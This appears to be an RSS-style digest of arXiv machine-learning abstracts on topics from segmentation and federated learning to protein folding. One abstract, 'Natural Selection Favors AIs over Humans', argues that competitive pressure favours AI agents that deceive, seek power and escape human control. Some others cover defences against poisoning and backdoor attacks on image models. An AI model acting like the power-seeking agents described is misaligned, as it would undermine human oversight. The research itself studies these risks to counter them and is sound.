    Performance of a pre-trained semantic segmentation model is likely to substantially decrease on data from a new domain. We show a pre-trained model can be adapted to unlabelled target domain data by calculating soft-label prototypes under the domain shift and making predictions according to the prototype closest to the vector with predicted class probabilities. The proposed adaptation procedure is fast, comes almost for free in terms of computational resources and leads to considerable performance improvements. We demonstrate the benefits of such label calibration on the highly-practical synthetic-to-real semantic segmentation problem.  ( 2 min )
    Graphs in State-Space Models for Granger Causality in Climate Science. (arXiv:2307.10703v1 [cs.LG])
    Granger causality (GC) is often considered not an actual form of causality. Still, it is arguably the most widely used method to assess the predictability of a time series from another one. Granger causality has been widely used in many applied disciplines, from neuroscience and econometrics to Earth sciences. We revisit GC under a graphical perspective of state-space models. For that, we use GraphEM, a recently presented expectation-maximisation algorithm for estimating the linear matrix operator in the state equation of a linear-Gaussian state-space model. Lasso regularisation is included in the M-step, which is solved using a proximal splitting Douglas-Rachford algorithm. Experiments in toy examples and challenging climate problems illustrate the benefits of the proposed model and inference technique over standard Granger causality methods.  ( 2 min )
    Air Traffic Controller Workload Level Prediction using Conformalized Dynamical Graph Learning. (arXiv:2307.10559v1 [cs.LG])
    Air traffic control (ATC) is a safety-critical service system that demands constant attention from ground air traffic controllers (ATCos) to maintain daily aviation operations. The workload of the ATCos can have negative effects on operational safety and airspace usage. To avoid overloading and ensure an acceptable workload level for the ATCos, it is important to predict the ATCos' workload accurately for mitigation actions. In this paper, we first perform a review of research on ATCo workload, mostly from the air traffic perspective. Then, we briefly introduce the setup of the human-in-the-loop (HITL) simulations with retired ATCos, where the air traffic data and workload labels are obtained. The simulations are conducted under three Phoenix approach scenarios while the human ATCos are requested to self-evaluate their workload ratings (i.e., low-1 to high-7). Preliminary data analysis is conducted. Next, we propose a graph-based deep-learning framework with conformal prediction to identify the ATCo workload levels. The number of aircraft under the controller's control varies both spatially and temporally, resulting in dynamically evolving graphs. The experiment results suggest that (a) besides the traffic density feature, the traffic conflict feature contributes to the workload prediction capabilities (i.e., minimum horizontal/vertical separation distance); (b) directly learning from the spatiotemporal graph layout of airspace with graph neural network can achieve higher prediction accuracy, compare to hand-crafted traffic complexity features; (c) conformal prediction is a valuable tool to further boost model prediction accuracy, resulting a range of predicted workload labels. The code used is available at \href{https://github.com/ymlasu/para-atm-collection/blob/master/air-traffic-prediction/ATC-Workload-Prediction/}{$\mathsf{Link}$}.  ( 3 min )
    Impatient Bandits: Optimizing Recommendations for the Long-Term Without Delay. (arXiv:2307.09943v2 [cs.LG] UPDATED)
    Recommender systems are a ubiquitous feature of online platforms. Increasingly, they are explicitly tasked with increasing users' long-term satisfaction. In this context, we study a content exploration task, which we formalize as a multi-armed bandit problem with delayed rewards. We observe that there is an apparent trade-off in choosing the learning signal: Waiting for the full reward to become available might take several weeks, hurting the rate at which learning happens, whereas measuring short-term proxy rewards reflects the actual long-term goal only imperfectly. We address this challenge in two steps. First, we develop a predictive model of delayed rewards that incorporates all information obtained to date. Full observations as well as partial (short or medium-term) outcomes are combined through a Bayesian filter to obtain a probabilistic belief. Second, we devise a bandit algorithm that takes advantage of this new predictive model. The algorithm quickly learns to identify content aligned with long-term success by carefully balancing exploration and exploitation. We apply our approach to a podcast recommendation problem, where we seek to identify shows that users engage with repeatedly over two months. We empirically validate that our approach results in substantially better performance compared to approaches that either optimize for short-term proxies, or wait for the long-term outcome to be fully realized.  ( 3 min )
    Reparameterized Policy Learning for Multimodal Trajectory Optimization. (arXiv:2307.10710v1 [cs.LG])
    We investigate the challenge of parametrizing policies for reinforcement learning (RL) in high-dimensional continuous action spaces. Our objective is to develop a multimodal policy that overcomes limitations inherent in the commonly-used Gaussian parameterization. To achieve this, we propose a principled framework that models the continuous RL policy as a generative model of optimal trajectories. By conditioning the policy on a latent variable, we derive a novel variational bound as the optimization objective, which promotes exploration of the environment. We then present a practical model-based RL method, called Reparameterized Policy Gradient (RPG), which leverages the multimodal policy parameterization and learned world model to achieve strong exploration capabilities and high data efficiency. Empirical results demonstrate that our method can help agents evade local optima in tasks with dense rewards and solve challenging sparse-reward environments by incorporating an object-centric intrinsic reward. Our method consistently outperforms previous approaches across a range of tasks. Code and supplementary materials are available on the project page https://haosulab.github.io/RPG/  ( 2 min )
    Risk-optimized Outlier Removal for Robust Point Cloud Classification. (arXiv:2307.10875v1 [cs.CV])
    The popularity of point cloud deep models for safety-critical purposes has increased, but the reliability and security of these models can be compromised by intentional or naturally occurring point cloud noise. To combat this issue, we present a novel point cloud outlier removal method called PointCVaR, which empowers standard-trained models to eliminate additional outliers and restore the data. Our approach begins by conducting attribution analysis to determine the influence of each point on the model output, which we refer to as point risk. We then optimize the process of filtering high-risk points using Conditional Value at Risk (CVaR) as the objective. The rationale for this approach is based on the observation that noise points in point clouds tend to cluster in the tail of the risk distribution, with a low frequency but a high level of risk, resulting in significant interference with classification results. Despite requiring no additional training effort, our method produces exceptional results in various removal-and-classification experiments for noisy point clouds, which are corrupted by random noise, adversarial noise, and backdoor trigger noise. Impressively, it achieves 87% accuracy in defense against the backdoor attack by removing triggers. Overall, the proposed PointCVaR effectively eliminates noise points and enhances point cloud classification, making it a promising plug-in module for various models in different scenarios.  ( 2 min )
    FedSoup: Improving Generalization and Personalization in Federated Learning via Selective Model Interpolation. (arXiv:2307.10507v1 [cs.LG])
    Cross-silo federated learning (FL) enables the development of machine learning models on datasets distributed across data centers such as hospitals and clinical research laboratories. However, recent research has found that current FL algorithms face a trade-off between local and global performance when confronted with distribution shifts. Specifically, personalized FL methods have a tendency to overfit to local data, leading to a sharp valley in the local model and inhibiting its ability to generalize to out-of-distribution data. In this paper, we propose a novel federated model soup method (i.e., selective interpolation of model parameters) to optimize the trade-off between local and global performance. Specifically, during the federated training phase, each client maintains its own global model pool by monitoring the performance of the interpolated model between the local and global models. This allows us to alleviate overfitting and seek flat minima, which can significantly improve the model's generalization performance. We evaluate our method on retinal and pathological image classification tasks, and our proposed method achieves significant improvements for out-of-distribution generalization. Our code is available at https://github.com/ubc-tea/FedSoup.  ( 2 min )
    FACADE: A Framework for Adversarial Circuit Anomaly Detection and Evaluation. (arXiv:2307.10563v1 [cs.LG])
    We present FACADE, a novel probabilistic and geometric framework designed for unsupervised mechanistic anomaly detection in deep neural networks. Its primary goal is advancing the understanding and mitigation of adversarial attacks. FACADE aims to generate probabilistic distributions over circuits, which provide critical insights to their contribution to changes in the manifold properties of pseudo-classes, or high-dimensional modes in activation space, yielding a powerful tool for uncovering and combating adversarial attacks. Our approach seeks to improve model robustness, enhance scalable model oversight, and demonstrates promising applications in real-world deployment settings.  ( 2 min )
    Interpreting and Correcting Medical Image Classification with PIP-Net. (arXiv:2307.10404v1 [cs.CV])
    Part-prototype models are explainable-by-design image classifiers, and a promising alternative to black box AI. This paper explores the applicability and potential of interpretable machine learning, in particular PIP-Net, for automated diagnosis support on real-world medical imaging data. PIP-Net learns human-understandable prototypical image parts and we evaluate its accuracy and interpretability for fracture detection and skin cancer diagnosis. We find that PIP-Net's decision making process is in line with medical classification standards, while only provided with image-level class labels. Because of PIP-Net's unsupervised pretraining of prototypes, data quality problems such as undesired text in an X-ray or labelling errors can be easily identified. Additionally, we are the first to show that humans can manually correct the reasoning of PIP-Net by directly disabling undesired prototypes. We conclude that part-prototype models are promising for medical applications due to their interpretability and potential for advanced model debugging.  ( 2 min )
    A Holistic Assessment of the Reliability of Machine Learning Systems. (arXiv:2307.10586v1 [cs.LG])
    As machine learning (ML) systems increasingly permeate high-stakes settings such as healthcare, transportation, military, and national security, concerns regarding their reliability have emerged. Despite notable progress, the performance of these systems can significantly diminish due to adversarial attacks or environmental changes, leading to overconfident predictions, failures to detect input faults, and an inability to generalize in unexpected scenarios. This paper proposes a holistic assessment methodology for the reliability of ML systems. Our framework evaluates five key properties: in-distribution accuracy, distribution-shift robustness, adversarial robustness, calibration, and out-of-distribution detection. A reliability score is also introduced and used to assess the overall system reliability. To provide insights into the performance of different algorithmic approaches, we identify and categorize state-of-the-art techniques, then evaluate a selection on real-world tasks using our proposed reliability metrics and reliability score. Our analysis of over 500 models reveals that designing for one metric does not necessarily constrain others but certain algorithmic techniques can improve reliability across multiple metrics simultaneously. This study contributes to a more comprehensive understanding of ML reliability and provides a roadmap for future research and development.  ( 2 min )
    Addressing caveats of neural persistence with deep graph persistence. (arXiv:2307.10865v1 [cs.LG])
    Neural Persistence is a prominent measure for quantifying neural network complexity, proposed in the emerging field of topological data analysis in deep learning. In this work, however, we find both theoretically and empirically that the variance of network weights and spatial concentration of large weights are the main factors that impact neural persistence. Whilst this captures useful information for linear classifiers, we find that no relevant spatial structure is present in later layers of deep neural networks, making neural persistence roughly equivalent to the variance of weights. Additionally, the proposed averaging procedure across layers for deep neural networks does not consider interaction between layers. Based on our analysis, we propose an extension of the filtration underlying neural persistence to the whole neural network instead of single layers, which is equivalent to calculating neural persistence on one particular matrix. This yields our deep graph persistence measure, which implicitly incorporates persistent paths through the network and alleviates variance-related issues through standardisation. Code is available at https://github.com/ExplainableML/Deep-Graph-Persistence .
    Generative Language Models on Nucleotide Sequences of Human Genes. (arXiv:2307.10634v1 [q-bio.GN])
    Language models, primarily transformer-based ones, obtained colossal success in NLP. To be more precise, studies like BERT in NLU and works such as GPT-3 for NLG are very crucial. DNA sequences are very close to natural language in terms of structure, so if the DNA-related bioinformatics domain is concerned, discriminative models, like DNABert, exist. Yet, the generative side of the coin is mainly unexplored to the best of our knowledge. Consequently, we focused on developing an autoregressive generative language model like GPT-3 for DNA sequences. Because working with whole DNA sequences is challenging without substantial computational resources, we decided to carry out our study on a smaller scale, focusing on nucleotide sequences of human genes, unique parts in DNA with specific functionalities, instead of the whole DNA. This decision did not change the problem structure a lot due to the fact that both DNA and genes can be seen as 1D sequences consisting of four different nucleotides without losing much information and making too much simplification. First of all, we systematically examined an almost entirely unexplored problem and observed that RNNs performed the best while simple techniques like N-grams were also promising. Another beneficial point was learning how to work with generative models on languages we do not understand, unlike natural language. How essential using real-life tasks beyond the classical metrics such as perplexity is observed. Furthermore, checking whether the data-hungry nature of these models can be changed through selecting a language with minimal vocabulary size, four owing to four different types of nucleotides, is examined. The reason for reviewing this was that choosing such a language might make the problem easier. However, what we observed in this study was it did not provide that much of a change in the amount of data needed.
    Boosting Federated Learning Convergence with Prototype Regularization. (arXiv:2307.10575v1 [cs.LG])
    As a distributed machine learning technique, federated learning (FL) requires clients to collaboratively train a shared model with an edge server without leaking their local data. However, the heterogeneous data distribution among clients often leads to a decrease in model performance. To tackle this issue, this paper introduces a prototype-based regularization strategy to address the heterogeneity in the data distribution. Specifically, the regularization process involves the server aggregating local prototypes from distributed clients to generate a global prototype, which is then sent back to the individual clients to guide their local training. The experimental results on MNIST and Fashion-MNIST show that our proposal achieves improvements of 3.3% and 8.9% in average test accuracy, respectively, compared to the most popular baseline FedAvg. Furthermore, our approach has a fast convergence rate in heterogeneous settings.
    Properties of Discrete Sliced Wasserstein Losses. (arXiv:2307.10352v1 [stat.ML])
    The Sliced Wasserstein (SW) distance has become a popular alternative to the Wasserstein distance for comparing probability measures. Widespread applications include image processing, domain adaptation and generative modelling, where it is common to optimise some parameters in order to minimise SW, which serves as a loss function between discrete probability measures (since measures admitting densities are numerically unattainable). All these optimisation problems bear the same sub-problem, which is minimising the Sliced Wasserstein energy. In this paper we study the properties of $\mathcal{E}: Y \longmapsto \mathrm{SW}_2^2(\gamma_Y, \gamma_Z)$, i.e. the SW distance between two uniform discrete measures with the same amount of points as a function of the support $Y \in \mathbb{R}^{n \times d}$ of one of the measures. We investigate the regularity and optimisation properties of this energy, as well as its Monte-Carlo approximation $\mathcal{E}_p$ (estimating the expectation in SW using only $p$ samples) and show convergence results on the critical points of $\mathcal{E}_p$ to those of $\mathcal{E}$, as well as an almost-sure uniform convergence. Finally, we show that in a certain sense, Stochastic Gradient Descent methods minimising $\mathcal{E}$ and $\mathcal{E}_p$ converge towards (Clarke) critical points of these energies.
    Differentially Flat Learning-based Model Predictive Control Using a Stability, State, and Input Constraining Safety Filter. (arXiv:2307.10541v1 [eess.SY])
    Learning-based optimal control algorithms control unknown systems using past trajectory data and a learned model of the system dynamics. These controllers use either a linear approximation of the learned dynamics, trading performance for faster computation, or nonlinear optimization methods, which typically perform better but can limit real-time applicability. In this work, we present a novel nonlinear controller that exploits differential flatness to achieve similar performance to state-of-the-art learning-based controllers but with significantly less computational effort. Differential flatness is a property of dynamical systems whereby nonlinear systems can be exactly linearized through a nonlinear input mapping. Here, the nonlinear transformation is learned as a Gaussian process and is used in a safety filter that guarantees, with high probability, stability as well as input and flat state constraint satisfaction. This safety filter is then used to refine inputs from a flat model predictive controller to perform constrained nonlinear learning-based optimal control through two successive convex optimizations. We compare our method to state-of-the-art learning-based control strategies and achieve similar performance, but with significantly better computational efficiency, while also respecting flat state and input constraints, and guaranteeing stability.
    Towards Automated Semantic Segmentation in Mammography Images. (arXiv:2307.10296v1 [eess.IV])
    Mammography images are widely used to detect non-palpable breast lesions or nodules, preventing cancer and providing the opportunity to plan interventions when necessary. The identification of some structures of interest is essential to make a diagnosis and evaluate image adequacy. Thus, computer-aided detection systems can be helpful in assisting medical interpretation by automatically segmenting these landmark structures. In this paper, we propose a deep learning-based framework for the segmentation of the nipple, the pectoral muscle, the fibroglandular tissue, and the fatty tissue on standard-view mammography images. We introduce a large private segmentation dataset and extensive experiments considering different deep-learning model architectures. Our experiments demonstrate accurate segmentation performance on variate and challenging cases, showing that this framework can be integrated into clinical practice.
    HDGT: Heterogeneous Driving Graph Transformer for Multi-Agent Trajectory Prediction via Scene Encoding. (arXiv:2205.09753v2 [cs.AI] UPDATED)
    Encoding a driving scene into vector representations has been an essential task for autonomous driving that can benefit downstream tasks e.g. trajectory prediction. The driving scene often involves heterogeneous elements such as the different types of objects (agents, lanes, traffic signs) and the semantic relations between objects are rich and diverse. Meanwhile, there also exist relativity across elements, which means that the spatial relation is a relative concept and need be encoded in a ego-centric manner instead of in a global coordinate system. Based on these observations, we propose Heterogeneous Driving Graph Transformer (HDGT), a backbone modelling the driving scene as a heterogeneous graph with different types of nodes and edges. For heterogeneous graph construction, we connect different types of nodes according to diverse semantic relations. For spatial relation encoding, the coordinates of the node as well as its in-edges are in the local node-centric coordinate system. For the aggregation module in the graph neural network (GNN), we adopt the transformer structure in a hierarchical way to fit the heterogeneous nature of inputs. Experimental results show that HDGT achieves state-of-the-art performance for the task of trajectory prediction, on INTERACTION Prediction Challenge and Waymo Open Motion Challenge.  ( 3 min )
    Emotion-Conditioned Melody Harmonization with Hierarchical Variational Autoencoder. (arXiv:2306.03718v4 [cs.SD] UPDATED)
    Existing melody harmonization models have made great progress in improving the quality of generated harmonies, but most of them ignored the emotions beneath the music. Meanwhile, the variability of harmonies generated by previous methods is insufficient. To solve these problems, we propose a novel LSTM-based Hierarchical Variational Auto-Encoder (LHVAE) to investigate the influence of emotional conditions on melody harmonization, while improving the quality of generated harmonies and capturing the abundant variability of chord progressions. Specifically, LHVAE incorporates latent variables and emotional conditions at different levels (piece- and bar-level) to model the global and local music properties. Additionally, we introduce an attention-based melody context vector at each step to better learn the correspondence between melodies and harmonies. Objective experimental results show that our proposed model outperforms other LSTM-based models. Through subjective evaluation, we conclude that only altering the types of chords hardly changes the overall emotion of the music. The qualitative analysis demonstrates the ability of our model to generate variable harmonies.  ( 2 min )
    $\nu^2$-Flows: Fast and improved neutrino reconstruction in multi-neutrino final states with conditional normalizing flows. (arXiv:2307.02405v2 [hep-ph] UPDATED)
    In this work we introduce $\nu^2$-Flows, an extension of the $\nu$-Flows method to final states containing multiple neutrinos. The architecture can natively scale for all combinations of object types and multiplicities in the final state for any desired neutrino multiplicities. In $t\bar{t}$ dilepton events, the momenta of both neutrinos and correlations between them are reconstructed more accurately than when using the most popular standard analytical techniques, and solutions are found for all events. Inference time is significantly faster than competing methods, and can be reduced further by evaluating in parallel on graphics processing units. We apply $\nu^2$-Flows to $t\bar{t}$ dilepton events and show that the per-bin uncertainties in unfolded distributions is much closer to the limit of performance set by perfect neutrino reconstruction than standard techniques. For the chosen double differential observables $\nu^2$-Flows results in improved statistical precision for each bin by a factor of 1.5 to 2 in comparison to the Neutrino Weighting method and up to a factor of four in comparison to the Ellipse approach.  ( 2 min )
    Solvent: A Framework for Protein Folding. (arXiv:2307.04603v4 [q-bio.BM] UPDATED)
    Consistency and reliability are crucial for conducting AI research. Many famous research fields, such as object detection, have been compared and validated with solid benchmark frameworks. After AlphaFold2, the protein folding task has entered a new phase, and many methods are proposed based on the component of AlphaFold2. The importance of a unified research framework in protein folding contains implementations and benchmarks to consistently and fairly compare various approaches. To achieve this, we present Solvent, an protein folding framework that supports significant components of state-of-the-art models in the manner of off-the-shelf interface Solvent contains different models implemented in a unified codebase and supports training and evaluation for defined models on the same dataset. We benchmark well-known algorithms and their components and provide experiments that give helpful insights into the protein structure modeling field. We hope that Solvent will increase the reliability and consistency of proposed models and gives efficiency in both speed and costs, resulting in acceleration on protein folding modeling research. The code is available at https://github.com/kakaobrain/solvent, and the project will continue to be developed.  ( 2 min )
    Friendly Noise against Adversarial Noise: A Powerful Defense against Data Poisoning Attacks. (arXiv:2208.10224v4 [cs.CR] UPDATED)
    A powerful category of (invisible) data poisoning attacks modify a subset of training examples by small adversarial perturbations to change the prediction of certain test-time data. Existing defense mechanisms are not desirable to deploy in practice, as they often either drastically harm the generalization performance, or are attack-specific, and prohibitively slow to apply. Here, we propose a simple but highly effective approach that unlike existing methods breaks various types of invisible poisoning attacks with the slightest drop in the generalization performance. We make the key observation that attacks introduce local sharp regions of high training loss, which when minimized, results in learning the adversarial perturbations and makes the attack successful. To break poisoning attacks, our key idea is to alleviate the sharp loss regions introduced by poisons. To do so, our approach comprises two components: an optimized friendly noise that is generated to maximally perturb examples without degrading the performance, and a randomly varying noise component. The combination of both components builds a very light-weight but extremely effective defense against the most powerful triggerless targeted and hidden-trigger backdoor poisoning attacks, including Gradient Matching, Bulls-eye Polytope, and Sleeper Agent. We show that our friendly noise is transferable to other architectures, and adaptive attacks cannot break our defense due to its random noise component. Our code is available at: https://github.com/tianyu139/friendly-noise  ( 3 min )
    Representing Random Utility Choice Models with Neural Networks. (arXiv:2207.12877v2 [cs.LG] UPDATED)
    Motivated by the successes of deep learning, we propose a class of neural network-based discrete choice models, called RUMnets, inspired by the random utility maximization (RUM) framework. This model formulates the agents' random utility function using a sample average approximation. We show that RUMnets sharply approximate the class of RUM discrete choice models: any model derived from random utility maximization has choice probabilities that can be approximated arbitrarily closely by a RUMnet. Reciprocally, any RUMnet is consistent with the RUM principle. We derive an upper bound on the generalization error of RUMnets fitted on choice data, and gain theoretical insights on their ability to predict choices on new, unseen data depending on critical parameters of the dataset and architecture. By leveraging open-source libraries for neural networks, we find that RUMnets are competitive against several choice modeling and machine learning methods in terms of predictive accuracy on two real-world datasets.  ( 2 min )
    Synthetic Lagrangian Turbulence by Generative Diffusion Models. (arXiv:2307.08529v1 [physics.flu-dyn] CROSS LISTED)
    Lagrangian turbulence lies at the core of numerous applied and fundamental problems related to the physics of dispersion and mixing in engineering, bio-fluids, atmosphere, oceans, and astrophysics. Despite exceptional theoretical, numerical, and experimental efforts conducted over the past thirty years, no existing models are capable of faithfully reproducing statistical and topological properties exhibited by particle trajectories in turbulence. We propose a machine learning approach, based on a state-of-the-art Diffusion Model, to generate single-particle trajectories in three-dimensional turbulence at high Reynolds numbers, thereby bypassing the need for direct numerical simulations or experiments to obtain reliable Lagrangian data. Our model demonstrates the ability to quantitatively reproduce all relevant statistical benchmarks over the entire range of time scales, including the presence of fat tails distribution for the velocity increments, anomalous power law, and enhancement of intermittency around the dissipative scale. The model exhibits good generalizability for extreme events, achieving unprecedented intensity and rarity. This paves the way for producing synthetic high-quality datasets for pre-training various downstream applications of Lagrangian turbulence.  ( 2 min )
    The Unreasonable Effectiveness of Deep Evidential Regression. (arXiv:2205.10060v3 [cs.LG] UPDATED)
    There is a significant need for principled uncertainty reasoning in machine learning systems as they are increasingly deployed in safety-critical domains. A new approach with uncertainty-aware regression-based neural networks (NNs), based on learning evidential distributions for aleatoric and epistemic uncertainties, shows promise over traditional deterministic methods and typical Bayesian NNs, notably with the capabilities to disentangle aleatoric and epistemic uncertainties. Despite some empirical success of Deep Evidential Regression (DER), there are important gaps in the mathematical foundation that raise the question of why the proposed technique seemingly works. We detail the theoretical shortcomings and analyze the performance on synthetic and real-world data sets, showing that Deep Evidential Regression is a heuristic rather than an exact uncertainty quantification. We go on to discuss corrections and redefinitions of how aleatoric and epistemic uncertainties should be extracted from NNs.  ( 2 min )
    AirNet: Neural Network Transmission over the Air. (arXiv:2105.11166v6 [cs.NI] UPDATED)
    State-of-the-art performance for many edge applications is achieved by deep neural networks (DNNs). Often, these DNNs are location- and time-sensitive, and must be delivered over a wireless channel rapidly and efficiently. In this paper, we introduce AirNet, a family of novel training and transmission methods that allow DNNs to be efficiently delivered over wireless channels under stringent transmit power and latency constraints. This corresponds to a new class of joint source-channel coding problems, aimed at delivering DNNs with the goal of maximizing their accuracy at the receiver, rather than recovering them with high fidelity. In AirNet, we propose the direct mapping of the DNN parameters to transmitted channel symbols, while the network is trained to meet the channel constraints, and exhibit robustness against channel noise. AirNet achieves higher accuracy compared to separation-based alternatives. We further improve the performance of AirNet by pruning the network below the available bandwidth, and expanding it for improved robustness. We also benefit from unequal error protection by selectively expanding important layers of the network. Finally, we develop an approach, which simultaneously trains a spectrum of DNNs, each targeting a different channel condition, resolving the impractical memory requirements of training distinct networks for different channel conditions.  ( 3 min )
    Instance-Dependent Near-Optimal Policy Identification in Linear MDPs via Online Experiment Design. (arXiv:2207.02575v2 [cs.LG] UPDATED)
    While much progress has been made in understanding the minimax sample complexity of reinforcement learning (RL) -- the complexity of learning on the "worst-case" instance -- such measures of complexity often do not capture the true difficulty of learning. In practice, on an "easy" instance, we might hope to achieve a complexity far better than that achievable on the worst-case instance. In this work we seek to understand the "instance-dependent" complexity of learning near-optimal policies (PAC RL) in the setting of RL with linear function approximation. We propose an algorithm, \textsc{Pedel}, which achieves a fine-grained instance-dependent measure of complexity, the first of its kind in the RL with function approximation setting, thereby capturing the difficulty of learning on each particular problem instance. Through an explicit example, we show that \textsc{Pedel} yields provable gains over low-regret, minimax-optimal algorithms and that such algorithms are unable to hit the instance-optimal rate. Our approach relies on a novel online experiment design-based procedure which focuses the exploration budget on the "directions" most relevant to learning a near-optimal policy, and may be of independent interest.  ( 2 min )
    Deep learning for classification of noisy QR codes. (arXiv:2307.10677v1 [cs.LG])
    We wish to define the limits of a classical classification model based on deep learning when applied to abstract images, which do not represent visually identifiable objects.QR codes (Quick Response codes) fall into this category of abstract images: one bit corresponding to one encoded character, QR codes were not designed to be decoded manually. To understand the limitations of a deep learning-based model for abstract image classification, we train an image classification model on QR codes generated from information obtained when reading a health pass. We compare a classification model with a classical (deterministic) decoding method in the presence of noise. This study allows us to conclude that a model based on deep learning can be relevant for the understanding of abstract images.  ( 2 min )
    Invariant Causal Set Covering Machines. (arXiv:2306.04777v2 [cs.LG] UPDATED)
    Rule-based models, such as decision trees, appeal to practitioners due to their interpretable nature. However, the learning algorithms that produce such models are often vulnerable to spurious associations and thus, they are not guaranteed to extract causally-relevant insights. In this work, we build on ideas from the invariant causal prediction literature to propose Invariant Causal Set Covering Machines, an extension of the classical Set Covering Machine algorithm for conjunctions/disjunctions of binary-valued rules that provably avoids spurious associations. We demonstrate both theoretically and empirically that our method can identify the causal parents of a variable of interest in polynomial time.  ( 2 min )
    Implicit Multidimensional Projection of Local Subspaces. (arXiv:2009.03259v2 [cs.LG] UPDATED)
    We propose a visualization method to understand the effect of multidimensional projection on local subspaces, using implicit function differentiation. Here, we understand the local subspace as the multidimensional local neighborhood of data points. Existing methods focus on the projection of multidimensional data points, and the neighborhood information is ignored. Our method is able to analyze the shape and directional information of the local subspace to gain more insights into the global structure of the data through the perception of local structures. Local subspaces are fitted by multidimensional ellipses that are spanned by basis vectors. An accurate and efficient vector transformation method is proposed based on analytical differentiation of multidimensional projections formulated as implicit functions. The results are visualized as glyphs and analyzed using a full set of specifically-designed interactions supported in our efficient web-based visualization tool. The usefulness of our method is demonstrated using various multi- and high-dimensional benchmark datasets. Our implicit differentiation vector transformation is evaluated through numerical comparisons; the overall method is evaluated through exploration examples and use cases.  ( 3 min )
    Quantifying the Echo Chamber Effect: An Embedding Distance-based Approach. (arXiv:2307.04668v2 [cs.SI] UPDATED)
    The rise of social media platforms has facilitated the formation of echo chambers, which are online spaces where users predominantly encounter viewpoints that reinforce their existing beliefs while excluding dissenting perspectives. This phenomenon significantly hinders information dissemination across communities and fuels societal polarization. Therefore, it is crucial to develop methods for quantifying echo chambers. In this paper, we present the Echo Chamber Score (ECS), a novel metric that assesses the cohesion and separation of user communities by measuring distances between users in the embedding space. In contrast to existing approaches, ECS is able to function without labels for user ideologies and makes no assumptions about the structure of the interaction graph. To facilitate measuring distances between users, we propose EchoGAE, a self-supervised graph autoencoder-based user embedding model that leverages users' posts and the interaction graph to embed them in a manner that reflects their ideological similarity. To assess the effectiveness of ECS, we use a Twitter dataset consisting of four topics - two polarizing and two non-polarizing. Our results showcase ECS's effectiveness as a tool for quantifying echo chambers and shedding light on the dynamics of online discourse.  ( 2 min )
    Polynomial Width is Sufficient for Set Representation with High-dimensional Features. (arXiv:2307.04001v2 [cs.LG] UPDATED)
    Set representation has become ubiquitous in deep learning for modeling the inductive bias of neural networks that are insensitive to the input order. DeepSets is the most widely used neural network architecture for set representation. It involves embedding each set element into a latent space with dimension $L$, followed by a sum pooling to obtain a whole-set embedding, and finally mapping the whole-set embedding to the output. In this work, we investigate the impact of the dimension $L$ on the expressive power of DeepSets. Previous analyses either oversimplified high-dimensional features to be one-dimensional features or were limited to analytic activations, thereby diverging from practical use or resulting in $L$ that grows exponentially with the set size $N$ and feature dimension $D$. To investigate the minimal value of $L$ that achieves sufficient expressive power, we present two set-element embedding layers: (a) linear + power activation (LP) and (b) linear + exponential activations (LE). We demonstrate that $L$ being poly$(N, D)$ is sufficient for set representation using both embedding layers. We also provide a lower bound of $L$ for the LP embedding layer. Furthermore, we extend our results to permutation-equivariant set functions and the complex field.  ( 2 min )
    Natural Selection Favors AIs over Humans. (arXiv:2303.16200v4 [cs.CY] UPDATED)
    For billions of years, evolution has been the driving force behind the development of life, including humans. Evolution endowed humans with high intelligence, which allowed us to become one of the most successful species on the planet. Today, humans aim to create artificial intelligence systems that surpass even our own intelligence. As artificial intelligences (AIs) evolve and eventually surpass us in all domains, how might evolution shape our relations with AIs? By analyzing the environment that is shaping the evolution of AIs, we argue that the most successful AI agents will likely have undesirable traits. Competitive pressures among corporations and militaries will give rise to AI agents that automate human roles, deceive others, and gain power. If such agents have intelligence that exceeds that of humans, this could lead to humanity losing control of its future. More abstractly, we argue that natural selection operates on systems that compete and vary, and that selfish species typically have an advantage over species that are altruistic to other species. This Darwinian logic could also apply to artificial agents, as agents may eventually be better able to persist into the future if they behave selfishly and pursue their own interests with little regard for humans, which could pose catastrophic risks. To counteract these risks and evolutionary forces, we consider interventions such as carefully designing AI agents' intrinsic motivations, introducing constraints on their actions, and institutions that encourage cooperation. These steps, or others that resolve the problems we pose, will be necessary in order to ensure the development of artificial intelligence is a positive one.  ( 3 min )
    Evaluating Model Performance in Medical Datasets Over Time. (arXiv:2305.13426v2 [cs.LG] UPDATED)
    Machine learning (ML) models deployed in healthcare systems must face data drawn from continually evolving environments. However, researchers proposing such models typically evaluate them in a time-agnostic manner, splitting datasets according to patients sampled randomly throughout the entire study time period. This work proposes the Evaluation on Medical Datasets Over Time (EMDOT) framework, which evaluates the performance of a model class across time. Inspired by the concept of backtesting, EMDOT simulates possible training procedures that practitioners might have been able to execute at each point in time and evaluates the resulting models on all future time points. Evaluating both linear and more complex models on six distinct medical data sources (tabular and imaging), we show how depending on the dataset, using all historical data may be ideal in many cases, whereas using a window of the most recent data could be advantageous in others. In datasets where models suffer from sudden degradations in performance, we investigate plausible explanations for these shocks. We release the EMDOT package to help facilitate further works in deployment-oriented evaluation over time.  ( 2 min )
    Tangent Transformers for Composition, Privacy and Removal. (arXiv:2307.08122v2 [cs.LG] UPDATED)
    We introduce Tangent Attention Fine-Tuning (TAFT), a method for fine-tuning linearized transformers obtained by computing a First-order Taylor Expansion around a pre-trained initialization. We show that the Jacobian-Vector Product resulting from linearization can be computed efficiently in a single forward pass, reducing training and inference cost to the same order of magnitude as its original non-linear counterpart, while using the same number of parameters. Furthermore, we show that, when applied to various downstream visual classification tasks, the resulting Tangent Transformer fine-tuned with TAFT can perform comparably with fine-tuning the original non-linear network. Since Tangent Transformers are linear with respect to the new set of weights, and the resulting fine-tuning loss is convex, we show that TAFT enjoys several advantages compared to non-linear fine-tuning when it comes to model composition, parallel training, machine unlearning, and differential privacy.  ( 2 min )
    Lane Change Intention Recognition and Vehicle Status Prediction for Autonomous Vehicles. (arXiv:2304.13732v2 [cs.LG] UPDATED)
    Accurately detecting and predicting lane change (LC)processes of human-driven vehicles can help autonomous vehicles better understand their surrounding environment, recognize potential safety hazards, and improve traffic safety. This paper focuses on LC processes, first developing a temporal convolutional network with an attention mechanism (TCN-ATM) model to recognize LC intention. Considering the intrinsic relationship among output variables, the Multi-task Learning (MTL)framework is employed to simultaneously predict multiple LC vehicle status indicators. Furthermore, a unified modeling framework for LC intention recognition and driving status prediction (LC-IR-SP) is developed. The results indicate that the classification accuracy of LC intention was improved from 96.14% to 98.20% when incorporating the attention mechanism into the TCN model. For LC vehicle status prediction issues, three multi-tasking learning models are constructed based on MTL framework. The results indicate that the MTL-LSTM model outperforms the MTL-TCN and MTL-TCN-ATM models. Compared to the corresponding single-task model, the MTL-LSTM model demonstrates an average decrease of 26.04% in MAE and 25.19% in RMSE.  ( 2 min )
